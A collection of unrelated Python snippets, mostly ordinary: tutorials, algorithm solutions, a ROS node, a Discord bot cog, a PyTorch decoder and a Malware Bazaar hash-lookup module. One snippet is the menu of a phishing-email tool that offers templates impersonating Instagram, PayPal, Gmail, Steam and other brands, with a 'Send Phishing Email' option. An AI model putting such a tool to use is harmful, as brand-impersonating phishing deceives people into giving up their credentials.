text stringlengths 8 6.05M |
|---|
# Import required modules (project-local: fresh_tomatoes renders/serves the
# page, media defines the Movie class)
import fresh_tomatoes
import media

# Initialize instances of specific movies.
# NOTE(review): media.Movie appears to take (title, poster_url, trailer_url)
# based on the three positional arguments below -- confirm against media.py.
fitzcarraldo = media.Movie("Fitzcarraldo",
                           "http://www.impawards.com/1982/posters/fitzcarraldo.jpg",  # NOQA
                           "https://www.youtube.com/watch?v=gqugru2d1h8")
nosferatu = media.Movie("Nosferatu the Vampyre",
                        "https://polishpostershop.com/media/catalog/product/cache/1/image/9df78eab33525d08d6e5fb8d27136e95/k/a/kaja-poster04482.jpg",  # NOQA
                        "https://www.youtube.com/watch?v=S1Rachk7ipI")
aguirre = media.Movie("Aguirre, the Wrath of \nGod",
                      "http://www.impawards.com/1972/posters/aguirre_wrath_of_god_ver2.jpg",  # NOQA
                      "https://www.youtube.com/watch?v=eJDuicFyJPg")
bad_lieutenant = media.Movie("Bad Lieutenant",
                             "http://www.impawards.com/2009/posters/bad_lieutenant_port_of_call_new_orleans_xlg.jpg",  # NOQA
                             "https://www.youtube.com/watch?v=rvy1qlbh5Q4")
my_son = media.Movie("My Son, My Son",
                     "http://www.impawards.com/2009/posters/my_son_my_son_what_have_ye_done.jpg",  # NOQA
                     "https://www.youtube.com/watch?v=nqVbo0GX07M")
queen_of_desert = media.Movie("Queen of the Desert",
                              "http://www.impawards.com/2015/posters/queen_of_the_desert.jpg",  # NOQA
                              "https://www.youtube.com/watch?v=5g2bBX_stcg")

# Create a list of movie instances (page display order)
movies = [fitzcarraldo, nosferatu, aguirre, bad_lieutenant, my_son,
          queen_of_desert]


def main():
    """Create an html file with movies and serve it via the 'file' protocol"""
    fresh_tomatoes.open_movies_page(movies)


if __name__ == '__main__':
    main()
|
# Demonstration of common str methods on a sample name.
name = "dayyan"
print(len(name))               # length of the string
print(name.find("n"))          # index of the first occurrence of "n"
print(name.capitalize())       # capitalizes the first letter
print(name.upper())            # all uppercase
print(name.lower())            # all lowercase
print(name.isdigit())          # True only if every character is a digit
print(name.isalpha())          # True only if every character is a letter
print(name.count("y"))         # number of occurrences of "y"
print(name.replace("a", "n"))  # replace every "a" with "n"
# BUG FIX: the original wrapped the repetition in int(), which raises
# ValueError because "dayyandayyandayyan" is not numeric. Multiplying a
# string by an int already repeats it; just print the repeated string.
print(name * 3)
# https://www.youtube.com/watch?v=2WZvl1R4A6g&list=PLZPZq0r_RZOOkUQbat8LyQii36cJf2SWT&index=
# Selection sort implementation
numbers = [3, 53, 65, 1, 321, 54, 76, 43, 2, 4, 66]


# Time: O(n^2) || Space: O(1)
def selectionSort(array):
    """Sort *array* in place by repeatedly swapping the minimum of the
    unsorted suffix into the front position."""
    size = len(array)
    for front in range(size):
        # Locate the smallest element in array[front:].
        smallest = front
        for probe in range(front + 1, size):
            if array[probe] < array[smallest]:
                smallest = probe
        # Swap it into place (no-op when front already holds the minimum).
        array[front], array[smallest] = array[smallest], array[front]


selectionSort(numbers)
print(numbers)
import csv
from pathlib import Path

# Location of the ULMFiT prediction output (hard-coded Windows path).
path = Path(r'C:/Data/Python/NLP/FatAcceptance/Training/Final/ULMFiT')
# 'utf' is a registered codec alias for UTF-8.
with open(path / 'pred.csv', encoding='utf') as f:
    reader = csv.reader(f)
    line = 0  # 1-based row counter; row 1 is the header
    num = 0   # running count of matching rows seen so far
    for row in reader:
        line += 1
        if line == 1:
            continue  # skip the header row
        # NOTE(review): assumes column 0 holds one label ('0') and column 2
        # another ('1'), i.e. a disagreement/false-positive row -- confirm
        # against whatever wrote pred.csv.
        if row[0] == '0' and row[2] == '1':
            num += 1
            print('%s: %s' % (num, row[1]))
# -*- coding: utf-8 -*-
class Solution:
    def minTimeToType(self, word: str) -> int:
        """Return the total seconds needed to type *word* on a circular
        a-z dial.

        The pointer starts at 'a'. Rotating by one letter (either
        direction) costs 1 second, and typing the selected letter costs
        1 more second.
        """
        total = 0
        position = "a"
        for target in word:
            total += self.timeToMove(position, target) + 1
            position = target
        return total

    def timeToMove(self, char1, char2) -> int:
        """Seconds to rotate from char1 to char2, taking the shorter way
        around the 26-letter circle."""
        gap = abs(ord(char1) - ord(char2))
        return min(gap, 26 - gap)
# Smoke-test the solution when run as a script (examples from the problem
# statement).
if __name__ == "__main__":
    solution = Solution()
    assert 5 == solution.minTimeToType("abc")
    assert 7 == solution.minTimeToType("bza")
    assert 34 == solution.minTimeToType("zjpc")
|
# Demo of the project-local ICICI bank-account class.
from ICICI import ICICI  # from the ICICI.py module we import the ICICI class

ravi = ICICI()       # create an account object referenced by ravi
ravi.deposit(1000)   # deposit into the account via the reference
ravi.showBalance()   # print/show the current balance
|
#python imports
import sys
import os
import time
import datetime
import subprocess
import json
import requests
from termcolor import colored
#third-party imports
#No third-party imports
#programmer generated imports
from logger import logger
from fileio import fileio
'''
***BEGIN DESCRIPTION***
Type: Triage - Description: Retrieves any available data for a target against the Abuse.ch Malware Bazaar database.
***END DESCRIPTION***
'''
def POE(POE):
    """Triage module: query the abuse.ch Malware Bazaar API for POE.SHA256.

    Writes the raw JSON response to <POE.logdir>/MalwareBazaar.json, then
    re-reads that file to report the sample's first_seen / last_seen /
    signature fields, logging them when POE.logging is enabled.

    Returns 0 on success, -1 when the response could not be written or the
    downloaded file could not be parsed.
    """
    if POE.logging == True:
        LOG = logger()
        newlogentry = 'Module: malware_bazaar'
        LOG.WriteStrongLog(POE.logdir, POE.targetfilename, newlogentry)

    # Fields extracted from the downloaded JSON (kept as raw stripped lines).
    query_status = ''
    first_seen = ''
    last_seen = ''
    signature = ''
    sig_count = 0  # only the first 'signature' line is kept

    output = POE.logdir + 'MalwareBazaar.json'
    FI = fileio()

    print(colored('\r\n[*] Running abuse.ch Malware Bazaar against: ' + POE.target, 'white', attrs=['bold']))

    malwarebazaar = "https://mb-api.abuse.ch/api/v1/"  # API URL
    data = {  # POST parameters
        'query': 'get_info',
        'hash': POE.SHA256,
    }
    response_dump = requests.post(malwarebazaar, data=data, timeout=15)  # results as JSON

    if POE.debug == True:
        print(response_dump)

    try:
        FI.WriteLogFile(output, response_dump.content.decode("utf-8", "ignore"))
        print(colored('[*] Malware Bazaar data had been written to file here: ', 'green') + colored(output, 'blue', attrs=['bold']))
        if (POE.logging == True) and (POE.nolinksummary == False):
            newlogentry = 'Malware Bazaar data has been generated to file here: <a href=\"' + output + '\"> Malware Bazaar Host Output </a>'
            LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
    # BUG FIX: was a bare "except:", which also swallows SystemExit and
    # KeyboardInterrupt; catch Exception instead.
    except Exception:
        print(colored('[x] Unable to write Malware Bazaar data to file', 'red', attrs=['bold']))
        if POE.logging == True:
            newlogentry = 'Unable to write Malware Bazaar data to file'
            LOG.WriteStrongSubLog(POE.logdir, POE.targetfilename, newlogentry)
        POE.csv_line += 'N/A,'
        return -1

    try:
        # Open the file we just downloaded. The "with" blocks close the
        # file automatically; the original's explicit read_file.close()
        # calls were redundant, and the one inside the except handler could
        # raise NameError (masking the real error) if open() itself failed.
        print('[-] Reading Malware Bazaar file: ' + output.strip())
        with open(output.strip(), 'rb') as read_file:
            data = json.load(read_file, cls=None)

        # Check what kind of results we have.
        query_status = data["query_status"]
        print('[*] query_status: ' + query_status)

        if query_status == 'ok':
            # Grep the raw JSON text line-by-line for the fields of interest.
            with open(output.strip(), 'r') as read_file:
                for string in read_file:
                    if POE.debug == True:
                        print('[DEBUG] string: ' + string.strip())
                    if 'first_seen' in string:
                        first_seen = string.strip()
                    if 'last_seen' in string:
                        last_seen = string.strip()
                    if ('signature' in string) and (sig_count == 0):
                        signature = string.strip()
                        sig_count += 1

            print('[*] Sample ' + first_seen.replace(',', ''))
            print('[*] Sample ' + last_seen.replace(',', ''))
            print('[*] Sample ' + signature.replace(',', ''))

            if POE.logging == True:
                newlogentry = 'Sample ' + first_seen.replace(',', '')
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
                newlogentry = 'Sample ' + last_seen.replace(',', '')
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
                newlogentry = 'Sample ' + signature.replace(',', '')
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
        # Can't find anything on this one...
        elif query_status == 'hash_not_found':
            print(colored('[-] The hash value has not been found...', 'yellow', attrs=['bold']))
            if POE.logging == True:
                newlogentry = 'No results available for host...'
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
        # Can't find anything on this one...
        elif query_status == 'no_results':
            print(colored('[-] No results available for host...', 'yellow', attrs=['bold']))
            if POE.logging == True:
                newlogentry = 'No results available for host...'
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
        # Something weird happened...
        else:
            print(colored('[x] An error has occurred...', 'red', attrs=['bold']))
            if POE.logging == True:
                newlogentry = 'An error has occurred...'
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
    except Exception as e:
        print(colored('[x] Error: ' + str(e) + ' Terminating...', 'red', attrs=['bold']))
        return -1

    # NOTE: the original's unused reputation_dump / reputation_output_data
    # locals and the no-op "global json" declaration were removed.
    return 0
|
from collections import OrderedDict
from typing import Dict, Optional
from torch import nn, Tensor
from torch.nn import functional as F
from ...utils import _log_api_usage_once
class _SimpleSegmentationModel(nn.Module):
    """Backbone + classifier segmentation wrapper.

    The backbone must return a dict of feature tensors containing the key
    "out" (and "aux" when an auxiliary classifier is attached). Each head's
    logits are bilinearly upsampled back to the input's spatial size.
    """

    __constants__ = ["aux_classifier"]

    def __init__(self, backbone: nn.Module, classifier: nn.Module, aux_classifier: Optional[nn.Module] = None) -> None:
        super().__init__()
        _log_api_usage_once(self)
        self.backbone = backbone
        self.classifier = classifier
        self.aux_classifier = aux_classifier

    def forward(self, x: Tensor) -> Dict[str, Tensor]:
        spatial_size = x.shape[-2:]
        # contract: features is a dict of tensors
        features = self.backbone(x)

        result = OrderedDict()
        main_logits = self.classifier(features["out"])
        result["out"] = F.interpolate(main_logits, size=spatial_size, mode="bilinear", align_corners=False)

        if self.aux_classifier is not None:
            aux_logits = self.aux_classifier(features["aux"])
            result["aux"] = F.interpolate(aux_logits, size=spatial_size, mode="bilinear", align_corners=False)

        return result
|
# number 1: create a variable and print it
savings = 100
print(savings)

# number 2: compound growth over 7 periods
savings = 100
factor = 1.10
result = savings * factor ** 7
print(result)

# number 3: a string and a boolean
desc = "compound interest"
profitable = True

# number 4
# a = float  b = str  c = bool

# number 5: type behaviour of * and + on numbers vs strings
savings = 100
factor = 1.1
desc = "compound interest"
year1 = savings * factor          # int * float -> float
print(type(year1))
doubledesc = desc + desc          # str + str -> concatenation
print(doubledesc)

# number 6: explicit conversions for printing and parsing
savings = 100
result = 100 * 1.10 ** 7
print(f"I started with ${savings} and now have ${result}. Awesome!")
pi_string = "3.1415926"
pi_float = float(pi_string)       # str -> float

# number 7
# "The correct answer to this multiple choice exercise is answer number " + 2
|
#!/usr/bin/env python
import math
import rospy
from nav_msgs.msg import Odometry
# Known landmarks in the map: (name, x, y) in the odom frame.
# (Was five separate append() calls with stray trailing semicolons; a single
# list literal is the idiomatic Python form.)
benda = [
    ('Cube', 0.31, -0.99),
    ('Dumpster', 0.11, -2.42),
    ('Cylinder', -1.14, -2.88),
    ('Barrier', -2.59, -0.83),
    ('Bookshelf', -0.09, 0.53),
]
def jarak(x1, y1, x2, y2):
    """Euclidean distance between (x1, y1) and (x2, y2).

    BUG FIX: the original computed sqrt(abs(dx*dx - dy*dy)), which is not a
    distance -- e.g. it returned 0 for the points (0, 0) and (1, 1). The
    correct formula sums the squares: sqrt(dx^2 + dy^2); math.hypot does
    exactly that (and avoids intermediate overflow).
    """
    return math.hypot(x1 - x2, y1 - y2)
def callback(msg):
    """Odometry callback: log the landmark nearest the robot's current pose."""
    x = msg.pose.pose.position.x
    y = msg.pose.pose.position.y
    # Linear scan for the minimum-distance landmark.
    closest_name = None
    closest_dist = None
    for lname, lx, ly in benda:
        dist = jarak(x, y, lx, ly)
        if closest_dist is None or dist < closest_dist:
            closest_name = lname
            closest_dist = dist
    rospy.loginfo('closest: {}'.format(closest_name))
def main():
    """Start the location_monitor node and subscribe to /odom."""
    rospy.init_node('location_monitor')
    rospy.Subscriber('/odom', Odometry, callback)
    rospy.spin()  # block until the node is shut down


if __name__ == '__main__':
    main()
|
# coding:gb2312
# Intro to the while loop (comments translated from Chinese; the printed
# strings themselves are runtime output and are left untouched).
print("Whlie 循环从1数到5:")
num = 1
while num <= 5:
    print(num)
    num += 1

# Let the user choose when to quit: echo each input back until 'quit'.
prompt = "\nTell me something,and i will repeat it back to you:"
prompt += "\nEnter 'quit' to end the program."
message = ''
while message != 'quit':
    message = input(prompt)
    if message != 'quit':
        print(message)
|
# WSGI entry point: expose the app object under the name "application",
# which is what WSGI servers look for.
from app import app as application

if __name__ == '__main__':
    # BUG FIX: the original called app.run(), but the object was imported
    # under the alias "application", so the name "app" is undefined here
    # and the call raised NameError. Use the alias.
    application.run()

'''
from wsgiref.simple_server import make_server
httpd = make_server('localhost', 8051, application)
print("Serving at http://localhost:8051/ \n PRESS CTRL+C to Terminate. \n")
httpd.serve_forever()
print("Terminated!!")
'''
class solution:
    def maxProfile(self, prices):
        """Maximum profit from at most two buy/sell transactions.

        Standard "Best Time to Buy and Sell Stock III" DP: buy1/sell1/
        buy2/sell2 track the best cash balance after each of the four
        possible actions considering the first i days.

        BUG FIX: the original raised IndexError on an empty price list
        (it read prices[0] unconditionally); an empty input now returns 0.
        """
        if not prices:
            return 0
        n = len(prices)
        buy1 = [0] * n
        buy1[0] = -prices[0]
        sell1 = [0] * n
        buy2 = [0] * n
        buy2[0] = -prices[0]
        sell2 = [0] * n
        # Day 0 is handled by the initialisations above.
        for i in range(1, n):
            buy1[i] = max(buy1[i - 1], 0 - prices[i])
            sell1[i] = max(sell1[i - 1], buy1[i - 1] + prices[i])
            buy2[i] = max(buy2[i - 1], sell1[i - 1] - prices[i])
            sell2[i] = max(sell2[i - 1], buy2[i - 1] + prices[i])
        return sell2[n - 1]
if __name__ == '__main__':
    # Quick smoke test: a single price allows no profitable transaction.
    sol = solution()
    prices = [1]
    print(sol.maxProfile(prices))  # expected output: 0
|
# Dictionary demo: a phonebook whose values mix strings and a list.
phonebook = {'Anirach': '777-1111', 'Mickey': '777-2222', 'Donald': '777-3333'}
phonebook['Bart'] = [1, 3, 5]  # a list value alongside the string values

elements = len(phonebook)
print('There are ', elements, ' names in phonebook')

# Iterate key/value pairs in insertion order.
for key, number in phonebook.items():
    print(key, ' phone number is: ', number)

# List values stay mutable inside the dict.
phonebook['Bart'][1] = 9
print(phonebook)
print(list(phonebook))

# Same listing again, but in reverse insertion order.
for i in reversed(list(phonebook)):
    print(i, 'phone number is :', phonebook[i])
|
from discord import Member, Embed, Color
from discord.ext import tasks, commands
from tinydb import Query
from time import time
from Utilities.Database import commissionsTable
from Utilities.CommissionsHelper import (
add_commission,
remove_commission,
update_all_commissions,
)
from Utilities.HasPermissions import has_permissions
class CommissionsCog(commands.Cog):
    """Discord cog managing time-limited commissions stored in TinyDB."""

    def __init__(self, bot):
        self.bot = bot
        # Start the periodic maintenance loop as soon as the cog loads.
        self.update_commissions.start()

    def cog_unload(self):
        # Stop the background loop when the cog is removed.
        self.update_commissions.cancel()

    @commands.command(help="Gives a commission")
    @has_permissions()
    async def give(self, ctx, user: Member, days: int, *, name):
        """Assign *user* a commission called *name* lasting *days* days."""
        if user.bot:
            return await ctx.send("Bots can not have commissions")
        response = add_commission(user.guild.id, user.id, name, days)
        await ctx.send(response.get("message"))

    @commands.command(help="Cancels a commission")
    @has_permissions()
    async def cancel(self, ctx, user: Member, *, name=None):
        """Cancel one named commission, or all of the user's when no name
        is given."""
        if user.bot:
            return await ctx.send("Bots can not have commissions")
        response = remove_commission(user.guild.id, user.id, name)
        count = response.get("payload")  # number of commissions removed
        message = (
            "Successfully cancelled {} commission(s)".format(count)
            if name == None
            else "Successfully cancelled '{}' commission".format(name)
        )
        await ctx.send(message)

    @commands.command(help="Completes a commission")
    @has_permissions()
    async def complete(self, ctx, user: Member, *, name=None):
        """Mark one (or all) of the user's commissions as completed.

        NOTE(review): identical to cancel() apart from the wording --
        both outcomes are recorded by removing the commission.
        """
        if user.bot:
            return await ctx.send("Bots can not have commissions")
        response = remove_commission(user.guild.id, user.id, name)
        count = response.get("payload")
        message = (
            "Successfully completed {} commission(s)".format(count)
            if name == None
            else "Successfully completed '{}' commission".format(name)
        )
        await ctx.send(message)

    @commands.command(help="Views commissions")
    async def view(self, ctx, user: Member):
        """Show an embed listing the user's active commissions and the days
        remaining on each."""
        if user.bot:
            return await ctx.send("Bots can not have commissions")
        commissions_query = commissionsTable.search(
            (Query().guildId == user.guild.id) & (Query().userId == user.id)
        )
        total_commissions = len(commissions_query)
        embed = Embed(
            title="Commissions",
            description="{.display_name} has {} total active commission(s).".format(
                user, total_commissions
            )
            if total_commissions > 0
            else "{.display_name} has no active commissions.".format(user),
            colour=Color.purple(),
        )
        embed.set_author(name=user.display_name, icon_url=user.avatar_url)
        for user_record in commissions_query:
            timestamp = user_record.get("timestamp")  # start time (epoch s)
            days = user_record.get("days")            # total duration
            current_time = time()
            # 86400 seconds per day: expiry = start + duration.
            expire_time = timestamp + (days * 86400)
            days_left = round((expire_time - current_time) / 86400)
            embed.add_field(
                name=user_record.get("commission"),
                value="{} day(s) left".format(days_left),
                inline=True,
            )
        await ctx.send(embed=embed)

    @tasks.loop(minutes=5)
    async def update_commissions(self):
        # Periodic maintenance pass over all commissions (expiry handling
        # lives in CommissionsHelper.update_all_commissions).
        await update_all_commissions(self.bot)

    @update_commissions.before_loop
    async def before_update_commissions(self):
        # Don't touch the database/API until the bot is fully connected.
        await self.bot.wait_until_ready()
|
import matplotlib.pyplot as plt
import matplotlib.ticker as mticker
def plotByMonth(df, name, title):
    """Bar-plot *df* by month, labelling the x axis as 'Mon YYYY'.

    *name* is only used by the (commented-out) savefig target; the figure
    is shown rather than saved.
    """
    labels = [stamp.strftime('%b %Y') for stamp in df.index]
    axes = df.plot(kind='bar', figsize=(15, 5), alpha=0.6)
    axes.xaxis.set_major_formatter(mticker.FixedFormatter(labels))
    plt.title(title)
    plt.ylabel('#Analyses')
    # plt.savefig('img/{0}.png'.format(name), bbox_inches='tight')
    plt.show()
def plotByMonthPercentage(df, name, title):
    """Stacked percentage bar-plot of *df* by month (y axis fixed to 0-1).

    *name* is only used by the (commented-out) savefig target; the figure
    is shown rather than saved.
    """
    labels = [stamp.strftime('%b %Y') for stamp in df.index]
    axes = df.plot(kind='bar', stacked=True, figsize=(15, 5), alpha=0.6)
    axes.xaxis.set_major_formatter(mticker.FixedFormatter(labels))
    axes.set_ylim([0, 1])
    plt.title(title)
    plt.ylabel('Percent (x100)')
    # plt.savefig('img/{0}.png'.format(name), bbox_inches='tight')
    plt.show()
from itertools import product, chain
from .. import grid
from . import tile
bg_colors = ['red', 'magenta', 'green', 'cyan', 'blue', 'cyan', 'yellow']
fg_colors = ['black', 'black', 'black', 'black', 'white', 'black', 'black']
class Grid(grid.Grid):
    """Terminal-rendered 2048 grid drawn via a blessed-style *term* object."""

    # Divider glyphs drawn between tiles.
    vert_div = '||'
    hor_div = '='
    cross_div = 'XX'

    def __init__(self, x=0, y=0, rows=0, cols=0, tile_width=0, tile_height=0,
                 term=None, Tile=tile.Tile):
        # (x, y) is the grid's top-left screen coordinate; tile_width /
        # tile_height are per-cell character dimensions.
        super(Grid, self).__init__(rows=rows, cols=cols, Tile=Tile)
        self.x, self.y = x, y
        self.tile_width, self.tile_height = tile_width, tile_height
        self.term = term

    def draw(self, fg='white', bg=None):
        """Draw the grid's divider lines in the given terminal colors."""
        # blessed exposes styles as attributes, e.g. term.white_on_blue.
        style = getattr(self.term, fg + ("_on_" + bg if bg else ""))
        rows, cols = len(self), len(self[0])
        # Vertical dividers between columns.
        for col_idx in range(cols - 1):
            hor_offset = ((col_idx + 1) * self.tile_width +
                          col_idx * len(self.vert_div))
            for vert_offset in range(self.height):
                with self.term.location(self.x + hor_offset,
                                        self.y + vert_offset):
                    print(style(self.vert_div))
        # Horizontal dividers between rows, with crossings at intersections.
        for row_idx in range(rows - 1):
            vert_offset = (row_idx + 1) * self.tile_height + row_idx
            with self.term.location(self.x, self.y + vert_offset):
                print(style(self.cross_div.join(
                    [self.hor_div * self.tile_width] * cols)))

    def update_tiles(self):
        """Refresh every tile's on-screen position and size from the grid."""
        # NOTE(review): the local name `tile` shadows the imported `tile`
        # module inside this method.
        for row_idx, col_idx in product(range(len(self)), range(len(self[0]))):
            if self[row_idx][col_idx]:
                tile = self[row_idx][col_idx]
                tile.x, tile.y = self.tile_coord(row_idx, col_idx)
                tile.height, tile.width = self.tile_height, self.tile_width
                self[row_idx][col_idx] = tile

    def draw_tiles(self):
        """Draw every non-empty tile in its exponent-derived colors."""
        for tile in filter(None, chain(*self)):  # all non-empty tiles
            # choose a color, use modulo to support any value of a tile
            # all bg colors have a bright variant doubling the amount of colors
            color_idx = (tile.exponent - 1) % (len(bg_colors) * 2) // 2
            bg = bg_colors[color_idx]
            if self.term.number_of_colors >= 16 and tile.exponent % 2 == 0:
                bg = "bright_" + bg
            tile.draw(fg=fg_colors[color_idx], bg=bg)

    def draw_empty_tile(self, row, column):
        """Blank out the cell at (row, column) with spaces."""
        x, y = self.tile_coord(row, column)
        for y_offset in range(self.tile_height):
            with self.term.location(x, y + y_offset):
                print(' ' * self.tile_width)

    @property
    def width(self):
        # Total width in characters: tiles plus the dividers between them.
        cols = len(self[0])
        if cols > 0:
            return cols * self.tile_width + (cols - 1) * len(self.vert_div)
        return 0

    @property
    def height(self):
        # Total height in lines: tiles plus one divider line per gap.
        rows = len(self)
        if rows > 0:
            return rows * self.tile_height + rows - 1
        return 0

    def tile_coord(self, row, column):
        """Screen (x, y) of the cell at (row, column).

        Raises IndexError when the cell lies outside the grid.
        """
        if row >= len(self) or column >= len(self[0]):
            raise IndexError
        x = self.x + column * self.tile_width + column * len(self.vert_div)
        y = self.y + row * self.tile_height + row
        return x, y

    def spawn_tile(self, *args, **kwargs):
        """Spawn a tile via the base class, then position it on screen."""
        action = super(Grid, self).spawn_tile(*args, **kwargs)
        row, column = action.new
        if kwargs.get('apply', True):
            x, y = self.tile_coord(row, column)
            self[row][column].x, self[row][column].y = x, y
            self[row][column].height = self.tile_height
            self[row][column].width = self.tile_width
        return action

    def move(self, *args, **kwargs):
        """Apply a move via the base class and reposition the moved tiles."""
        actions = super(Grid, self).move(*args, **kwargs)
        if kwargs.get('apply', True):
            for action in actions:
                row, col = action.new
                self[row][col].x, self[row][col].y = self.tile_coord(row, col)
        return actions
|
#Normal Import
import time
import os
import sys
#emails:
from Core.eletter import Instagram
from Core.eletter import Facebook
from Core.eletter import Gmail
from Core.eletter import Twitter
from Core.eletter import AskFM
from Core.eletter import Webhost000
from Core.eletter import Blockchain
from Core.eletter import Spotify
from Core.eletter import Rockstar
from Core.eletter import Dreamteam
from Core.eletter import RiotGames
from Core.eletter import Steam
from Core.eletter import Gamehag
from Core.eletter import GmailActivity
from Core.eletter import SnapchatSimple
from Core.devicemenu import Linkedin
from Core.devicemenu import Dropbox
from Core.ipmenu import Discord
from Core.ipmenu import Paypal1
from Core.ipmenu import Snapchat
#EmailSender:
from Core.mailer import NormalEmail
# ANSI color escape codes used by the menu.
red = ("\033[1;31;40m")
green = ("\033[1;32;40m")
white = ("\033[1;37;40m")
blue = ("\033[1;34;40m")

os.system("clear")
time.sleep(0.5)

# Render the template-selection menu (text preserved verbatim).
print(white + "options:")
print(green + "[" + white + "1" + green + "]" + white + " Instagram" + green + " [" + white + "11" + green + "]" + white + " Paypal")
print(green + "[" + white + "2" + green + "]" + white + " Facebook" + green + " [" + white + "12" + green + "]" + white + " Discord")
print(green + "[" + white + "3" + green + "]" + white + " Gmail" + green + " [" + white + "13" + green + "]" + white + " Spotify")
print(green + "[" + white + "4" + green + "]" + white + " Gmail (simple)" + green + " [" + white + "14" + green + "]" + white + " Blockchain")
print(green + "[" + white + "5" + green + "]" + white + " Twitter" + green + " [" + white + "15" + green + "]" + white + " RiotGames")
print(green + "[" + white + "6" + green + "]" + white + " Snapchat" + green + " [" + white + "16" + green + "]" + white + " Rockstar")
print(green + "[" + white + "7" + green + "]" + white + " Snapchat (simple)" + green + " [" + white + "17" + green + "]" + white + " AskFM")
print(green + "[" + white + "8" + green + "]" + white + " Steam" + green + " [" + white + "18" + green + "]" + white + " 000Webhost")
print(green + "[" + white + "9" + green + "]" + white + " Dropbox" + green + " [" + white + "19" + green + "]" + white + " Dreamteam")
print(green + "[" + white + "10" + green + "]" + white + " Linkedin" + green + " [" + white + "20" + green + "]" + white + " Gamehag")
print(green + "-----------------------------------------------------------------------")
print(green + "[" + white + "30" + green + "]" + white + " Send Phishing Email")
print(green + "[" + white + "99" + green + "]" + red + " EXIT")
print(green + "[" + white + "1337" + green + "]" + white + " Info\n")
print(green)

# Map each menu number to its handler. A dict dispatch replaces the
# original 24-branch if/elif chain (same behavior, far less repetition).
TEMPLATES = {
    1: Instagram, 2: Facebook, 3: Gmail, 4: GmailActivity, 5: Twitter,
    6: Snapchat, 7: SnapchatSimple, 8: Steam, 9: Dropbox, 10: Linkedin,
    11: Paypal1, 12: Discord, 13: Spotify, 14: Blockchain, 15: RiotGames,
    16: Rockstar, 17: AskFM, 18: Webhost000, 19: Dreamteam, 20: Gamehag,
    30: NormalEmail,
}

# NOTE: as in the original, non-numeric input raises ValueError here.
mailPick = int(input("root@phishmailer:~ " + white))

if mailPick in TEMPLATES:
    TEMPLATES[mailPick]()
elif mailPick == 99:
    os.system("clear")
    print("Hope I See You Soon")
    print("Happy Phishing")
    sys.exit()
elif mailPick == 1337:
    print("\n" + green + "[" + white + "+" + green + "]" + white + " I Do Not Take Any Responsibility For Your Actions")
    print("\n" + green + "[" + white + "+" + green + "]" + white + " But I Don't Give A F*ck About What You Do")
else:
    print("\nSomething Went Wrong There Partner")
    print("Are You Ok? Did You Fell Out The Boat And Started Drowning?")
    sys.exit()
|
import torch
import torch.nn as nn
from model.audio_encoder import RNN
class res_linear_layer(nn.Module):
    """Two Linear + BatchNorm + ReLU stages of width *linear_hidden*.

    *time* is the BatchNorm1d channel count, i.e. dimension 1 of the
    input (so for a 3-D (batch, time, linear_hidden) input it normalises
    over the time axis). The residual addition is performed by the
    caller, not inside this module.
    """

    def __init__(self, linear_hidden=1024, time=1024):
        super(res_linear_layer, self).__init__()
        stages = [
            nn.Linear(linear_hidden, linear_hidden),
            nn.BatchNorm1d(time),
            nn.ReLU(),
            nn.Linear(linear_hidden, linear_hidden),
            nn.BatchNorm1d(time),
            nn.ReLU(),
        ]
        self.layer = nn.Sequential(*stages)

    def forward(self, input):
        # Shape-preserving transform of the input.
        return self.layer(input)
class pose_decoder(nn.Module):
    """Decode per-frame pose vectors (batch, 50, 36) into feature vectors.

    Output width (tmpsize) is 128 for 'min' encoder variants, 256
    otherwise. The rnn_noise / size / layeri attributes are configured
    here but unused by forward() as written.
    """

    def __init__(self, batch, hidden_channel_num=64, input_c=266, linear_hidden=1024, encoder='gru'):
        super(pose_decoder, self).__init__()
        self.batch = batch
        self.encoder = encoder
        # 'min' encoder variants use half-width features.
        self.tmpsize = 128 if 'min' in encoder else 256
        if 'initp' in self.encoder:
            self.size = self.tmpsize + 10 + 5
        else:
            self.size = self.tmpsize + 10
        #self.relu = nn.ReLU()
        #self.decoder = nn.GRU(bidirectional=True,hidden_size=36, input_size=266,num_layers= 3, batch_first=True)
        #self.fc=nn.Linear(72,36)
        # TODO! change here!!!!!
        # Noise RNN matches the encoder family (LSTM vs GRU); not used in
        # forward() below.
        if 'lstm' in encoder:
            self.rnn_noise = nn.LSTM(10, 10, batch_first=True)
        else:
            self.rnn_noise = nn.GRU(10, 10, batch_first=True)
        self.rnn_noise_squashing = nn.Tanh()
        # state size. hidden_channel_num*8 x 360 x 640
        if 'initp' in self.encoder:
            self.layeri = nn.Linear(36, 250)
        # NOTE(review): res_linear_layer defaults to BatchNorm1d(time=1024),
        # so the residual stack only matches shapes when linear_hidden is
        # 1024 -- confirm before using other widths.
        self.layer0 = nn.Linear(36, linear_hidden)
        self.layer1 = res_linear_layer(linear_hidden=linear_hidden)
        self.layer2 = res_linear_layer(linear_hidden=linear_hidden)
        self.layer3 = res_linear_layer(linear_hidden=linear_hidden)
        self.final_linear = nn.Linear(linear_hidden, self.tmpsize)

    def forward(self, input):
        #initpose : 18,2
        # input: -1, 50, 36
        # output: -1, 50, 128(or 256)
        input = input.view(-1, 36)
        output = self.layer0(input)
        # Residual MLP stack (skip connections added here, not in the layers).
        output = self.layer1(output) + output
        output = self.layer2(output) + output
        output = self.layer3(output) + output
        output = self.final_linear(output)
        # Restore the (batch, frames, features) layout.
        output = output.view(self.batch, 50, self.tmpsize)
        # output = output[:,1:,:]
        # print('output',output.size())
        #output = self.rnn_noise_squashing(output)
        return output
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from xpinyin import Pinyin
from django.shortcuts import render, render_to_response
from django import forms # 重点要导入,使用 Django 的 表单
from django.http import HttpResponse
from .models import Image
class ImageForm(forms.Form):
    """Upload form: a display name plus the image file itself."""
    name = forms.CharField()      # text field for the image's name
    headImg = forms.FileField()   # the uploaded file
'''
The view below checks whether the request is a POST and, if the form
validates, saves the uploaded file and returns "Upload OK !". The
file-saving code sits between validation and the OK response, because OK
is only returned once the upload has succeeded. A GET request simply
renders an empty form for the user to fill in.
'''
def upload(request):
    """Handle the image-upload form: POST saves the file, GET shows a blank form."""
    if request.method == "POST":
        uf = ImageForm(request.POST, request.FILES)
        if uf.is_valid():
